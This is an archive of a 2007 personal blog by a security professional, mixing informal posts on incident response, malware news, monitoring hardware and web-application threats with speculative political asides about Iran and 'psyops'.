Monday, December 24, 2007

fundementals

before i get started, since i know you ppl can't wait to hear, i've got version 1.1.0 in production, w/ those pesky (known) bugs worked out...

anyway, let's talk fundementals...

so my fun for today has been as follows... fortune 500 company server which processes credit card transactions has been owned. they, understandably, want to know the scope of the compromise... while digging through trying to figure out exactly what went down and how bad it is, i determine the probable vector...

brute force and/or dictionary ssh compromise...

"lol" i hear you say. "geeze, they must've had a weak ass password..." (ignoring that they allowed ssh root login, sigh) no, actually, it seems their password wasn't terribly weak. i say that because the server had been under sustained attack for at least 4 weeks... ><

the attacker script would try a random number (say n=2-5) of attempts and then wait (w=60-300) seconds for some time before trying again... presumably to throw off ids's and such....

companies spend all of these dollars on 5 figure boxes and all of this stuff for security... so why are they so averse to paying a sec guy to monitor logs on their production and critical servers? last time i checked, logcheck didn't cost too much, and man they woulda seen this one coming a mile away... ;)

Thursday, December 13, 2007

/me sighs...

so 1.0.0 has an uber bug, and i'm still at the office working (instead of celebrating)...

bleh... the irony blows...

Wednesday, December 12, 2007

woot for me

that project i've been workin on just rolled from 0.9.13c over to 1.0.0 :D

got a whole queue of post 1.0 work lined up, but it's a great milestone... a big ball of automation and scripting and stuff... anywho, we're gonna be running in production w/ it really soon, so i've gotta implement at much post 1.0 stuff before it gets into true prod (just to avoid patches and updates as much as possible), and i supposed i outta figure out why it doesn't work w/ ie7... lol...

hopefully this means i'll be spending some time workin on the blackhat talk in the near future...

woot for me!

Wednesday, December 5, 2007

china, modern malware, and common sense

[china]

so schneier keys into an article over at the times online about china doing mass pwnage around the series of tubes... i find it interesting how china has been just flaunting the lack of order and law enforcement across international interconnected networks. i think the first real thing i heard about was Titan Rain, and it has gone on and on since then.

i wonder if china is going to force some type of global agreement on protocols for interfering in internet traffic in the name of security. something requiring the cooperation of ISPs to null route traffic from offending blocks or something... i donno what's gonna happen, but it seems like this can't go on forever, and we've been seeing ISPs arguing to interfere w/ traffic for some time now... i love the EFF, but i wonder if net neutrality is gonna win out or not...

anyway, the most fascinating bit in here (imo) is that a

security expert who has also seen the letter said that among the techniques used by Chinese groups were "custom Trojans", software designed to hack into the network of a particular firm and feed back confidential data


say wot dawg?!? lmao... so this reminds me of back in the day the first time i ever heard of chinese UO farmers who sat and clicked for hours on end to level grind characters and items to sell to players in the states and elsewhere. never before that moment had i imagined these tasks being mass-produced, but in great chinese modern tradition, they made it happen.

so here we have the same. now the idea of the dedicated attacker is tilted sideways. no longer are we talking about a lone hacker or small elite group attacking a singular target of interest for glory or profit... no, this implies a frickin chinese farm of malware authors doing recon, writing malware, and collecting data.

and not just from .govs, but it has moved into the private sector, w/ financials and the like...

personally, i'm amazed that this hasn't been brought to china's attention on a broader and higher political level. i mean, it isn't like they could claim ignorance of private citizens or organized crime doing these attacks when they've invested so heavily into monitoring and controlling the inet traffic flowing throughout their country...


[modern malware]

maybe i'm behind the times, but sunbelt points out malware which looks at user agent to differentiate between mac and windows and sploit accordingly...

anyway, i got a kick outta running across it b/c my very first bit of infosec writing was a paper submitted to a security site (before blogs existed, lol) kinda talked about this type of thing. basically, i said that future virii wouldn't be the single sploit variety we saw at the time. we'd see virii which contained multiple payloads and attack vectors, and would attempt to id the vulns of a host, and even mb perform priviledge escalation attacks. it was all very out there in retrospect, and i'd link to it if i could find it, but the best i've done is a google cache of a table of contents which contains the title of the paper...

anyway, i may have overdone the complexity and imagined it happening sooner than it did, but it seems we're getting there...


[common sense]

ok, i stumbled across this paper talking about span ports versus taps... i don't mean to dog on it, because it is fairly well written and seems pretty accurate, but it irritated me on some level...

it talks about the advent of the SPAN port, and how it was viewed as a great simplification of monitoring traffic flows across a wire... then it goes on to say that SPAN ports aren't all that great... why not? well, because you really can't use them in GB and 10GB environments... and b/c they change frame timing, and error frames often aren't forwarded, and you'll get packet loss if the switch gets overloaded, and some more stuff.

this is kinda lame of me to say, but all of the people i know who have ever wondered if they should use a tap or a SPAN for a given implementation are already aware of at least the basics of most of these issues.

plus, it ignores the fact that running a tap means that i'll be using two ports on my sensor, since every tap i've ever seen ran two outputs to allow for full throughput viewing of TX and RX on the RX of your sensor(s). in some situations, this is a significant downside to a tap. not to mention the fact that a decent 10/100 tap is gonna cost you at least a few hundred bucks (unless the market has changed a lot since i last looked).

also, if my switch is getting overloaded, i've got bigger problems than a few dropped packets to a span port... in my real world experience, most switches tend to hang at 1-2% utilization, and when they go up towards 40+% proc, you're experiencing trouble on your network...

i guess the bit about the article that bugged me was that it didn't seem to attempt to frame the discussion into the real world at all. in reality, there are a ton of enterprise level orgs that don't have anything close to GB inet bandwidth... not to mention the multitudes of mom n pops... similarly, there are tons of enterprise orgs which run internal GB and 10GB links who don't monitor their internal segments w/ IDS or traffic analysis tools. many of these orgs only monitor their ingress/egress points. not to mention the tons of mom n pop shops who don't run GB internally at all.

so i walk away from the article saying "taps are the only real way to go", but the reality is that in many cases dropping your IDS or analysis tool on a span port on the managed switch that the client/customer already owns will do the job great. it'll save them some money, and the org will be more secure. if i'm droppin 10 IDS's in at remote sites, i'm saving them a chunk of change for a small compromise in risk, and in my book, that is a net gain and a good security tradeoff in the real world...

it is a well written article tho...

Monday, December 3, 2007

irc bot archiving

so /. picked up this story about this company which uses irc bots to lurk on irc rooms and record everything everyone says, and then makes it indexable and such...

i am far to lazy to go dig around to prove it, but i don't think these are the first guys in this game... i've been googling solutions to really obscure tech stuff at least 3 or 4 times in the past and i've come upon results which seemed to be irc-ish chatlogs...

basically, the log is just a txt style web page using the familiar irc "username: comment" format... as i scroll through the google cache looking for the highlighted keyword, i'm reading the conversation and it's just ppl chatting about misc stuff... not a page, not a blog, just a record of some conversation which happened to contain keywords that i was searching for and get ranked in the first few pages so i found it...

anyone else seen this?

Sunday, December 2, 2007

props to the beeb

Hello and thanks for the e-mail about the story on the arrest of the NZ teenager hacker (http://news.bbc.co.uk/1/hi/technology/7120251.stm). It was written by the overnight team who, it seems, have only a passing acquaintance with computer terminology. I've updated the story and tried to make it rather more accurate.


and it does indeed look better to me, as all references to spybot have been purged...

Friday, November 30, 2007

the long.... slow.... arm of the law....

ok, this is kinda funny... police "swoop" and catch a teenage hacker who has owned over a million computers and stolen millions of dollars...

yea, you are safer today, because this guy was a "whizzkid kingpin" behind "an international spybot ring"... i mean geeze, he took down an irc chat room b/c they kicked him out once...

(note: i wonder if spybot knows that the media has suddenly co-opted their name and made it synonymous to malware... /me smacks the ignorant ap and bbc tech reporters... sigh... i'm writing the bbc and ap to let them know...)

anyway, so this "very bright and very skilled" kid has been owning the heck outta the tubes... well, from what i gather, he is known for the creatively named "akbot" series of virii...

yes, these dangerous virii varients exploit uber-0days such as MS04-007 and MS04-011... according to sophos, the akbot-a varient was detected right about the begining of 2006... sooo, that's 1.5 years between vuln that this masterminds exploit release... really, he is dangerous... not a script kiddie who copied someone elses code and flipped some bits and got a series of variants named for his handle...

they say the feds thought he was extremely sophisticated, and that he used encryption to avoid AV detection, but this kinda flys in the face of the fact that there are multiple variant detections listed on av sites... i mean, virtually all malware is undetected by AV at some point in time, just b/c almost all AV is sig based... assuming they mean he used a packer/obfuscater like most malware authors...

i know i may be missing a lot of details, but this is what is being reported... i think it speaks to the lack of understanding of the severity of the infosec issues today if none of these articles mention these points...

i mean, one of those articles says "the FBI believes the raid has helped breakup the botnet network". yea, b/c the guy who logged into the IRC control channel isn't logging in anymore, so all of these infected computers have cleaned themselves of their infections? it is such old-world thinking to say "we've arrested the perp, so the crime is over"... how many of these 1,000,000+ infected machines just got akill through a dropper or some other vector, and have other malicious apps running... well, hrmm... since the vuln for this was patched 3 years ago, i'm gonna guess that a lot of em have other infections if they're hit w/ this... ;)

Thursday, November 29, 2007

sooo...

i sent that last box to the bit bucket (retaining a drive copy for further research when life lends me time)...

made some habbit and usage improvements... still some room for improvement beyond what i've done for sure... anywho... c'est la vie and all of that...

so i can't believe i didn't think of cracking passwords when i was hearing how the ps3 was rockin out at folding@home...

and looks like jdm is gonna be sad when he has to think up a new idea for his google os app competition... i still haven't figured a good one out yet... only spent like 10 min thinkin about it tho ;)

as for what is taking up most of my time... still the big project @ work... on rev 0.9.3-ish atm... mostly like little details left, and 3 or 4 mid sized hurdles...

i wish i posted sec links i didn't find on digg... sigh... i'm lame ;)

anywho, haven't moved much beyond hello-world on my first attempt at writing a firefox extension... think it'll be cool, but i gotta actually spend time workin on it...

that's it for now!

Thursday, November 15, 2007

/me sighs @ irony

so, as a great addition to my last post, today i come to find i have a malware issue on my windows box... blargh... glad i caught it...

it is a tad embarrassing, and i haven't had time yet to do an in-depth analysis to try to determine the extent of the damage. i've taken the basic steps to stop the bleeding, changed my passwords, and all of that... i've got a damn win box because i game, and then i get all lazy and use it for other things even though i have a perfectly capable nix box...

anyway, i know other sec profesionals who i respect who've been owned, so i'm tryin not to let it get me down... who knows if it'll ever come back to haunt me or not... anyway, i'm trying to use it as motivation to improve my setup at home, as well as some of my usage habits... part of the problem is that i do tech all day, and when i get home i'd just rather wrench on things or work on the house or play games... obviously that doesn't cut it, and i need to put in the time to make sure i'm covering my bases at home like i do every day at work... bleh bleh bleh... ><

anyway, here's why this reinforces my point. it looks like this thing came in over layer 7. despite not having the perfect setup, i think i probably do more than the avg user. my win box auto patches and auto reboots. i run av and anti-malware tools. i run no-script in firefox and try to be careful where i go and what i click. and my box still gets owned. imo, this doesn't bode well for the average user.

the very minor preliminary research i've done leads me to lean towards punkbuster running on CoD (the original) being the vector. the things i see correlate to a bit back when i was playing a game and 2 guys started chatting about stuff that made my ears perk-up in game... i wish i could remember what they said. anyway, they said something indicating they were about to do something, and then the server we're playin on hoses up. my box starts actin funky, so i kill the connection and bounce my box. i didn't dig any deeper than that at the time (just call me retardo).

anyway, cursory digging and i come to find that punkbuster has a slight history of vulnerabilities. There is a guy out there who apparently vigorously exploring this app... anyway, it sucks b/c from my understanding, pb runs at a really low level in order to be able to detect cheating. you've gotta be admin to run it, last time i checked (admitedly, a couple years ago), and apparently their app is coded like crap... sigh...

but yea... so none of my security steps kept pb up to date, and it looks like mb that's how i got popped... for what it's worth, running vista might've afforded me some protection b/c it has a better security model than xp, but i'm not even interested in messin w/ vista... from now on, my win box will only be for games, and i'm not gonna do anything else w/ it, and i'm not gonna give it connectivity to data and resources on other machines...

anyway, i'll post if i ever manage to dig any useful information from the traffic captures and forensics i've got on the pwnt box. i'm putting that stuff off at least a weak due to work and RW deadlines and pressures.

i'm thinking about writing an app to crawl vulnerability lists grepping for keywords of software that i run... i wonder if that already exists...

Wednesday, November 14, 2007

the post i've been waiting to write

i hope it's not a letdown...

so i recently had a conversation w/ a buddy of mine... he is getting a new gig at a multi-national multi-billion company as a sort of security manager/architect/roadmapper/evangalist type of a thing... congratz to him again btw!

so, while we are talking, we get on the subject of where the heck should he put his efforts? i mean, in an org w/ thousands of hosts, if you are given the task to come in as part of a team w/ a mandate to re-do infosec, where the heck do you start?

my two cents was that you assume machines are going to get owned to shit, so you do two things... your segment your data as best you can, to mitigate the damage of inevitable leaks. 2nd, you assume that modern malware will infect you and that the modern "security software industry" won't be able to help you at all, and you do everything you can to separate data and functionality from your OS, so you can blow potentially kitted machines away on a whim...

anywho... we had this abstract conversation about the changing state of infosec... if you look at infosec perceptions vs infosec realities, you see that there is a schism between the two. the mainstream is still caught up in the hacker image of the disgruntled youth in his basement who has you in his sights and is clicking away on his keyboard, executing commands on hosts on your network.

this is what was happening on your network a few years back, but it isn't the primary threat you face today.

today you can get owned every which way from sunday, and the pwner will never notice that he could blackmail you about your 3 illegitimate children. he isn't going to read your email or im conversations. he probably isn't going to notice anything about you unless you trip some software if/then about your online banking acct, if that.

todays blackhat zombie-net operator doesn't care about you. he cares about the number of digits making up his zombie network. hell, you might get owned and not even have a purpose. maybe he'll use you for spam, or maybe for ddos, or maybe cull you for online banking stuff... even he doesn't know yet. he is building a network. he is building it bigger. he is widening the corridors, and adding more lanes...

i had problems explaining this to a previous employer... they were like "we don't handle cash, and we have a low profile. who would attack us?". my response that they had thousands of hosts around the world and many megs of inet bandwidth was met with blank stares. they couldn't wrap their heads around (and/or i failed to communicate) the fact that the currency being traded in blackhat circles had evolved yet again.

infosec is an arms race. as we find effective defense, the attackers find new attacks.

this really begins to suck in corp land. i'm sorry, but those tens of thousands of dollars you spent on firewalls won't protect you from modern vectors. and the tens of thousands of dollars you spent on AV won't protect you from modern malware. and your patch management infrastructure won't protect you from the latest vuln in the jar: protocol.

hell, most of you in corp land aren't doing anything proactive to defend against buffer and stack overflows, and those relatively modern and too-complex-for-joe-user defenses don't help against many modern attacks...

sucks, but it is farkin true. and the worst part is that you don't get much relief on the old stuff. similar to kaminsky saying (at bh/dc) that the best (/worst) part about design bugs is that they come back from the dead, so too do attack vectors. even though your firewall probably won't protect you from phishing, you can't throw it away when you buy a new tool that will.

the modern frontier is the application layer, which anyone reading this post probably has known for quite some time. this is virtually virgin defense territory, and we're seeing many diff types of attacks:

XSS
XSRF
media files that own you or annoy you
trusted web sites that own you
poor cookie/session handling that owns you

ok, so i'm running firefox (which i wish i could set to default for all of my corp users, but they run in-house ie-specific web-apps for business, soooo) with noscript, so i've gotta be safe. except that i always hit some popular site that requires scripting to function properly, and i decide to trust them so i don't need to click something everytime i hit the site. oh crap, they get owned, and now i'm unknowningly running an invisible iframe back to some chinese site. it isn't like i'm going to see a defacement or something. look at the recent site hacks, like the myspace alicia keys hack. they try to be subtle and blend in. did you get an official email from myspace warning you that you might have issues since your myspace page links to alicias? hell no... oh yea, and that one wasn't even a script, it was mostly social engineering...

i mean, how many hosts am i gonna get if i manage to insert a hostile script into (for example) break.com? out of the total staff of break.com, what percentage of employees do you think are worried about security as their primary job? what is the likelihood of an exploited vuln at their site over the next 12 months? say it exists in the wild for 8 hours... how many hosts will you get? 10,000? more? if break.com doesn't get owned in the next 12 months, how many other sites are out there that your users visit? do you allow outbound www? if so, you have a problem...

do you trust your online bank? i've done assessments on some banks, and i can tell you that my idea of security was incorrect. and your bank probably outsources everything having to do w/ money to some external entity that provides an app they use to run their business. that same app is used across many diff branches of banks. did i mention there is no ingress/egress network/transport layer filtering across those links? and if i can write a sploit that works on bank-x, it might work on bank-y or z...

and security is anything but constant. i know a site which looked pretty good. down the road, they overhaul their web server settings, and poof, raw ownage. clients who hit the site w/ scripting enabled were sent to china to run bad bad code. the javascript used cookies and http posts to send heartbeat info back to china to let the operator know the status of their ever growing network. does anyone beyond the few ppl who've seen this application level sploit know it exists? it isn't a major popular site, but the users who hit it number in the thousands. is there a methodology to inform those users that they are at risk? if there was, can we tell them how to scan their boxes to know they are clean? will up-to-date windows patches protect them? will ad-aware get it? spybot? will the owned site owners consider notification in any form??? did you know that xyz bank can get completely owned and probably never publicly say a word about it? not that your money will go away, but just that the integrity of their servers, which you visit and trust, was compromised and that you might be running malicious code...

the brave new world is that hostile domains pop up and drop off the map before commercial security white/black lists can find them. they run traffic over common ports (80), or within accepted protocols (http).

wow, what a rant... the other main worry is a targeted attacker. there are corps who offer services to spy on specific targets... hell, 5 years ago my infosec prof told me about companies he saw that existed to evesdrop on cell phones and data-mine trash. these people are out there, and you know what they say about the dedicated attacker, so here's hopin they aren't lookin at you... and hell, if they do, will you know if it is a misunderstanding or an attack?

anyway, i've wasted wayyyy too many electrons on your monitor saying this, but the point is just that if you're admining infosec anywhere today, your biggest threat is your employees running http to the web via port 80 and 443, and currently you probably don't have any reasonable way to protect your org from the myriad of threats you're faced with. i'm not chicken-little, but the state of things is less than optimal atm...

the attackers have shifted, and the defenders need to as well. we need out of the box OS and application design to limit the trouble users can get themselves into. as a wise man i know loves to say, we can't base our defense around hoping that people make good security decisions. we need to get to the point where we don't offer them the option to make bad choices.

gov't snakeoil/fud... sigh...

ok, so unfortunately this article was dugg up...

it says:

two members of the U.K. government intelligence group Serious Organized Crime Agency connected a machine running Windows XP with Service Pack 1 to an unsecured wireless network. The machine was running no antivirus, firewall, or anti-spyware software

ok, what a great start... now, this demo these brit feds did was for small business owners, who in my experience seem to have the infosec bar set pretty low... but, using an os release which was, what, 3 years ago??? and, should i assume that this means that no security patches released after 2004 were applied to this target machine?

and for my next trick, i shall pwn a fbsd 4 server running ssh, sendmail, and an ssl webserver! phear my fed leeetness... sigh...

Mick used a common, open-source exploit-finding tool he had downloaded from the Internet. SOCA asked ZDNet UK not to divulge the name of the tool.

erm, metasploit?

Mick found the IP address of his own computer by using the XP Wireless Network Connection Status dialog box

...

Using a different attack tool, he produced a security report detailing the vulnerabilities found on the system

nessus? back to metasploit for this next one:

Using the attack tool, Mick built a piece of malware in MS-DOS, giving it a payload that would exploit the flaw within a couple of minutes

do you mean a cmd window? cause i kinda doubt even a 1337 govt h4x0r still boots into straight DOS...

well turns out the feds are trying to make a point...

purely to point out that, if a system hasn't had patches, it's a relatively simple matter to hack into it

ahh, brit tax dollars at work... soooo, using this information as a stepping stone, is it fair for me to deduce that said system probably won't boot up without the power cable plugged into an active electrical outlet?...

seriously though, is this the level that we believe infosec has w/ the populace? do we think that we haven't given most people the message that there are real threats out there, many of which are generally solved via windows update? or should i believe that since XP SP2 includes a "firewall" (a burning wall of bricks... quite impressive really... the burning security in the blinky thing scares off most of the germs in the tubes) it is difficult to integrate it into the business environment?

well, it does get worse...

Nick McGrath, head of platform strategy for Microsoft U.K., was surprised by the incident.

"In the demonstration we saw, it was both enlightening and frightening to witness the seeming ease of the attack on the (Windows) computer," said McGrath. "But the computer was new, not updated, and not patched."

ok, well the ms exec knows enough to know that an unpatched windows machine is vulnerable... i guess i can count this as a positive and raise the bar a tad off of the ground... but seriously, if there is _any_ ms exec who doesn't understand that unpatched security vulns can be exploited quickly and easily, then i'll go on the record as saying that whoever is responsible for internal evangilism at MS is utterly failing...

here's a genius idea... do a 10 min web-quiz for the people who run the #(@%&*@% company that makes the OS which runs most desktops on this planet...

oh, and i'd be remiss not to mention cnet and the author of this stellar article (which, btw, is what the nameless masses [who don't yet understand that patching is important] will read to find stuff out about infosec)... i can't believe that the technical prowess demonstrated in the article is what ZD considers appropriate for their infosec presence on the web... this "expert" writes pointless articles about unrealistic security ideas... they should just pick a schneier cryptogram blurb to publish once a month... cheaper and more effective...

i am now officially in a foul mood... sigh...

Saturday, November 10, 2007

hushmail sec foo

ok, so i'm not a hushmail user, but i've been generally aware of them since back in the day...

anyway, this article about them assisting law enforcement by turning over unencrypted copies of emails is kinda interesting. at first glance one might be tempted to see this as a violation of their basic principles, but it doesn't seem like that's the issue...

the premise of HM is that they are just a medium for email crypted in public strong algorithms, and they never control keys, so they can't read the mails even if they want to.

this is yet another story of strong security measures being compromised by usage and design choices because the strong security was inconvenient and/or unwieldy... the workaround they created to become more user-friendly introduced (known) risk into the equation. in the newer easier to use system, they set up the crypo, and so briefly have the keys.

in this case, people using the new methodology were pwnt by law enforcement using legal channels to ask HM to store and use those keys to decrypt the mails. btw, the HM ToS does not protect illegal activity...

the article notes a fairly obvious potential flaw in the high security model as well. in the high sec method, you have to install and exec a java applet (which you get from HM) which does all of the crypto on your box instead of the server. well, if there is malicious code introduced into the applet, HM can gank your keys.

despite this, i think good and intuitive software design can mitigate the risk as well as the inconvenience... if i ever did anything beyond scripting in my basement nowadays (and play CoD4 w000000t!!!!), i'd consider writing a firefox plugin which did the heavy lifting on running the java applet, and also did checksums on the applet to make sure HM doesn't try to send you a modified copy later. functional reverse engineering and/or blackboxing the applet (if it isn't already oss?) would strengthen the whole thing too... poof, risk window of crypto compromise reduced...

geeze, and this isn't even the post i intended to write when i logged in... stay tuned... ;)

Friday, November 2, 2007

bummer M$

when i first saw that MS is examining the javascript spec, i was kinda hopin there'd at least be a mention of security updates... all they seem to imply is embrace and extend... seems like mb part of a future FUD campaign... bummer :(

who knows tho...

in other news

i'm retarded... moving on...

i bumped into trip-codes, which are an interesting route to authentication (but not authorization, right?)...

i wonder if you could build out a public infrastructure similar to pool.ntp.org and/or openid that allows for salted trips useful over multiple sites...

i'm still neck-deep in scripting, automation, design, etc... doin lots of stuff on the fly, tryin to keep my eye on the prize... gettin closer...

Sunday, October 21, 2007

screw the backlog [psyop post]

ok, i'm skippin all the crap holdin me back, and movin on to this one...

there's a story that got dugg up recently.

anyway, it says that iran is going to put a 17 year old girl to death for defending herself against 3 rapists. to me, this sounds like a horrible thing, but it has something to do w/ iran, so i'm curious. i check out the 'blog' that runs the story. i hit previous stories a few times and it looks kinda normalish liberal blog. i drop 5 and 10 pages back and it starts to look a little more weird. well how far back does it go? the delay feels like a cgi, and the timing (and content) of the posts just looks a little weird to me:



*SNIP* (yea, dh is a totally legit webhost, and i'm a retard... like it says in pi, look for a pattern and you'll see it everywhere ;)

oh, and btw, got an idea (completely unrelated to this crap) for my next bh talk submission.... it is stickin w/ visual analysis of data, and may be an opportunity for some coding kung foo for peeps who are interested... will have to post more on that...

Thursday, October 18, 2007

sux!



i have been swamped w/ stuff and have a huge queue of backlogged articles and reading...

Monday, October 1, 2007

long time no post

been super busy... been workin @ home, which is new for me... took a bit to get used to it, but now i'm pumpin out code... speaking of, time for props to my homie for doin a good job on the wheel i'm reinventing (b/c i somehow lost my backup copy... sigh)...

but reinventing it has been fun... can't give a ton o details here, but it is in part a scriptified build of a server, which if you follow the happy path (read: dhcp) involves only a few hits of the enter key... it's not quite done, but it's a nifty where it stands today, and it involves building gentoo servers w/ SSP and PaX and other good security foo, combined w/ programming... what could be better than that?

anywho, not i've updated by blizzle, so mb my homie will stop giving me crap...

anywho, good sec posts to come within a week... being busy is such a two edged sword :-\

Friday, September 14, 2007

sec roundup

koo koo, now a scoped down sec post...

so recently there was this article about how MS moving into the Linux space w/ Novell was them subverting *nix and OSS, and how we should all scream that the sky is falling and MS is coming to murder our kids while we're being distracted by the sky...

i don't really buy it. imo, it seems to me that *nix and OSS have been so successful that MS adopts a strategy which consists of purchasing new teams of developers who might write better code which leverages code which is already good and not full of tons o legacy bugs and conventions.

this is merely an extension of a phenomenon we all saw w/ the introduction of competition into the browser market back in the day. successful alternate browsers (such as firefox) forced MS to dust off their IE dev team and start making IE updates post-netscape navigator.

MS trying to make better products that customers want isn't going to "hurt" OSS or linux. Ultimately, this move by MS can only be successful if they produce apps which fill the demands being satisfied by major nix and oss projects today: value, quality, performance, etc. this benefits everyone...

and for what it's worth, i was just at a client site last week where they said that Novell ZENworks endpoint security is nifty and full of cool sec bits... oh yea, and it runs on windows too... lol...

oh yea, looks like spammers are attacking anti-spammers yet again... the article ends on an interesting idea of spamware blocking anti-spam measures on the client... that'd be an interesting evolution of the arms race if it hasn't actually happened already.

you know, if they feel they have to jack things up, instead of degrading bit-torrent downloads (which btw 1: can be legitimate and 2: i actually want) maybe our ISPs could start down the slipperly slope of meddling w/ the internet by degrading things that i _don't_ want, like spam...

[PSYOP Update I]

so now we're gonna have broken out psyop posts, cause there is so much i don't want to mix it in w/ regular sec...

as others have noticed, there is some weird ass stuff going on w/ some US nukes. i am _ashamed_ to say that i saw this on sunday the 9th, and didn't think twice to say anything but "well that sure is a screwup". mb it is b/c i still hold out an underlying hope that no matter how far this thing goes, we won't see the use of even "tactical" nuclear weapons... anywho, this incident is either an ironic and unprecedented (?) mistake, or else it implies bad things to come.

iran is still in the news. looks like they're fighting back, presumably showing that they can dork up our economy... my prediction machine thinks this can be spun as an act of aggression...

in order to reduce the liklihood of some unfortunate precipitating even, we've decided to construct a base right on the iranian border... >cough<>cough<bullshit>cough<... the article notes something that sounds like the last war sales pitch:
[the US has] shifted its focus from Iran's alleged nuclear weapons program to its alleged shipment of IEDs across the Iraq-Iran border as the principal rationale in selling a possible attack

so then this story about insurgents using russian-made armored-piercing (shaped charge) grenades to kill US soldiers... this strikes me as quite similar to the EFP issue, and it sounds like iran is gonna be fingered w/ supplying these weapons...

[tangent]
speaking of russia... been seeing some cold war ish military maneuvers... and disolving govt is always a sign of stability... and the best being a ginormous bomb test... note that it is the 'father of all bombs', which i guess is intented to be more manly than our MOAB?

it may or may not be worth noting that this is a thermobaric weapon... described as inhumane, cruel, etc... also, we've been using smaller versions in afganistan and iraq for some time now ...
[/tangent]

last but not least. so apparently some lady in pennsylvania took a picture of the smoke from the flight 93 crash right after it happened. turns out that she is being harrassed and attacked by random and anonymous people; accused of doctoring the picture or using it in a get-rich scam... even though the FBI openly say they "have no reason to doubt" the legitimacy of the photo. sounds possibly similar to a tactic which seems to have been employed w/ some degree of success by scientologists: dead agenting

Thursday, September 13, 2007

back in town

back from training w/ juniper in dallas... good stuff all around, and good ppl too. here's a bit that helps me continue to believe there are corps that aren't all messed up:



anywho it was a good time. training and lab time and all of that; network focused. the dallas lab is pretty much something of everything from the product line (sometimes two; presumably when ha is expected) and some other interesting boxes. sry for the craptastic pic of part of it:



got some nda info on stuff in the pipe. not earth shattering (you've been hearing rumbles), but the outlined implementation is interesting.

i finally got to play w/ dynamic routing, and think i kinda understand it... ;)

Saturday, September 8, 2007

web2 application attack detection?

sooo, a blog post and the anti-rootkit blurb got me thinking...

i wonder if you could build a security framework based around a browser extension that either shimed itself into the datastream or spawned a sniffer process which watched packets on the wire or both...

can a non-virtual rootkit lie to you about a pcap call, or are you accessing the device directly?

anyway, i don't know enough about web2 attacks to know how you'd go about it, but it seems like there may be a way to do either signature or anomoly detection by watching http(s [if you're an ssl termination point / proxy]?) payloads... maybe through comparing:

  • what a user is doing in the browser vs what the browser is doing out to inet
  • what an os shows as active http connections and what packets are really going out across the wire
  • cached site functionality to new site functionality/script tags/calls

or maybe just keywording simple functionalities and setting up some type of zoning or alerting...

...

ok, i promised myself i wouldn't post about the psyop thing again... but... i lied...



after talkin it up about suitcase bombs and wmd, we move on to:


HANNITY: I believe Iran is fighting a war by proxy. They're funding Hezbollah to the tune of $100 million a year. They're providing the IEDs that are being used to kill American soldiers and providing soldiers as part of the insurgency, battling our soldiers. How do you handle Iran?

THOMPSON: ... They [Iran] are killing our people as we speak ... basically reprocessing that uranium enough to get fissile material ... most experts think well on their way to making a nuclear weapon and, of course, they've threatened Israel ... They are perhaps getting closer to a revolution in Iran. That economy is so bad, the civil oppression is so bad against their own people, we've got some friends among those people there, there are some good things that can happen.

HANNITY: So that means that America must have a plan and prepare for possible military action if they're on the verge of getting nuclear weapons?

THOMPSON: Yes.


tell me this is projection... lol... either that or some weird deja vu-ish thing...

Friday, September 7, 2007

back to reality

i'm gonna cry if i ever unwittingly admin a system w/ a flaw like this...

best quote:

As a result of today's breach, new measures were being added to what he described as a multi-layered security operation.


yea... a multi-layered operation which consists of believing what you're told... these are not the droids you're looking for... nice demo of _simple_ social engineering brutalizing a formidible defense...

in other news, still kicking around the rootkit detection tool ideas... mb got something out of the box to tinker w/...

something completely different... rumor has it a massive psyop is running soonish... don't see it yet, but mb it's subtle and i'm just not paying attn...

Monday, September 3, 2007

taking the scope out a tad...

well, looks like sony produced another solid piece of security enhancing software. imo, (unless i'm not keeping up w/ current events properly) rootkits are ready for easy to deploy automated scanning tools... seems like they are mb taking up some of the slack of buffer overflow defense work... best quote:

When the original Sony rootkit scandal hit, a Sony executive originally dismissed it by saying that "most people, I think, don't even know what a rootkit is, so why should they care about it?"


does this seem like it might produce the type of negativism we've been trying to avoid here at home?

... [they] were consultants working with Marines at Camp Pendleton. They say they were humiliated ...


how do you turn allies into enemies? mb by making them feel like you don't see them as allies based on irational fears? might be a stretch, but one could argue that this real-world issue is analogous to projecting information security into an environment...

speaking of RW security, has anyone else noticed the number of stories talking about things that are normally supposed to be secret...? like details of strategic and tactical military action? for the sources on these stories, are we seeing a minor revolt by the intellegence corps? did anyone else catch the bit about the rove resignation relating to iran? i saw an interview snippit in which he says he's leaving because he was asked to leave....

does the current usa admin team wonder if the tail could be wagging the dog? it seems like there might be other elements in the world looking to manipulate large geographic areas...

Wednesday, August 29, 2007

1st vid

in case you have 1.5 spare hrs...




i haven't gotten all the way through it yet, but i will...

Tuesday, August 28, 2007

nifty AD tool

soooo, i just heard about this new app made by the folks over at varonis...

basically, it crawls through your AD users and share perms, and can produce audit reports (for sox and the like) that say "this user has read access to these file/dirs, and full control on these files/dirs". it'll help you find open shares and all of that.

i can think of one company off the top of my head that could really use this app ;)

anywho, the nifty bit about it is that once you have it running (and you presumably have cleaned up your perms and all of that), then it begins to watch the patterns of file usage, and can generate reports on files which people have perms to but never access. and better than that, it can recognize changes in file access patterns. so in theory this will let you see a disgruntled employee attempted to do malicious things to data they have access to, or will let you see an employee copying data in preparation of leaving the company, etc....

unfortunately, they are a newer company and they might be a little too proud of their stuff... donno the details on pricing, but the rumor i heard was if you have a few hundred users, you might be pushing six figures.... ick...

Monday, August 27, 2007

looks like i've got a lot of reading to do

jdm is a busy sec blogger...

here's some light reading from my new boss... he says these techniques have application in infosec / forensic investigations...

and for RW reading, i'm in the middle of gray hat hacking... just skip the first section, which is a bunch of ethical foo, which most everyone either already subscribes to, or won't... from there it's been really good. i'm still early on, in an assessment area, but it looks like it gets to be really tech heavy into some good stuff later on...